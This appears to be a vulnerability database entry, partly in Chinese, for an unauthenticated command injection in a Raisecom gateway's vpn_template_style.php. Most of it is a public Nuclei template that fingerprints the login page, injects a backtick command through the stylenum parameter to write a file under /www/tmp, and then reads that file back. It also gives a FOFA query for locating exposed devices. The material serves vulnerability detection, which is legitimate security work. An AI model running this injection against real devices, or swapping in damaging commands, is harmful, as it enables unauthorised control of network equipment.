raisecom-rce: Raisecom Gateway vpn_template_style.php - Remote Command Execution

日期: 2025-08-01 | 影响软件: raisecom-rce | POC: 已公开

漏洞描述

The /vpn/vpn_template_style.php endpoint in Raisecom Multi-Service Intelligent Gateway is vulnerable to unauthenticated remote command execution. The stylenum parameter fails to properly sanitize user input, allowing attackers to inject system commands using backticks (`\) or pipe (|`) characters.

PoC代码[已公开]

id: raisecom-rce

info:
  name: Raisecom Gateway vpn_template_style.php - Remote Command Execution
  author: 3th1c_yuk1
  severity: critical
  description: |
    The /vpn/vpn_template_style.php endpoint in Raisecom Multi-Service Intelligent Gateway is vulnerable to unauthenticated remote command execution. The stylenum parameter fails to properly sanitize user input, allowing attackers to inject system commands using backticks (`\) or pipe (|`) characters.
  impact: |
    Successful exploitation allows arbitrary command execution on the target device, enabling actions such as file manipulation or system control. This vulnerability affects multiple instances and does not require authentication.
  reference:
    - https://github.com/koishi0x01/CVE/blob/main/CVE_1.md
  metadata:
    verified: true
    max-request: 2
    fofa-query: '"<TITLE>Web user login</TITLE>" && "<META content\==MSHTML 6.00.2900.5583\" name\=GENERATOR></HEAD>"'
  tags: raisecom,rce,intrusive,vuln

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Web user login")'
        condition: and
        internal: true

  - raw:
      - |
        GET /vpn/vpn_template_style.php?mySubmit=true&stylenum=%60echo+-e+%27{{string}}%27%3E/www/tmp/{{filename}}.txt%60 HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /tmp/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200"
          - 'contains(content_type_2, "text/plain")'
          - "contains(body_2, '{{string}}')"
        condition: and
# digest: 4b0a00483046022100ae7ce53eb008a7352e22a70a3c2f656173357db9d5d2cca142c3f97503b0f397022100a9484f06c2d63054f0432dc3d3a9bb20bae89bc9e315624c9ba12af6f97c1e2e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/raisecom-rce.yaml

相关漏洞推荐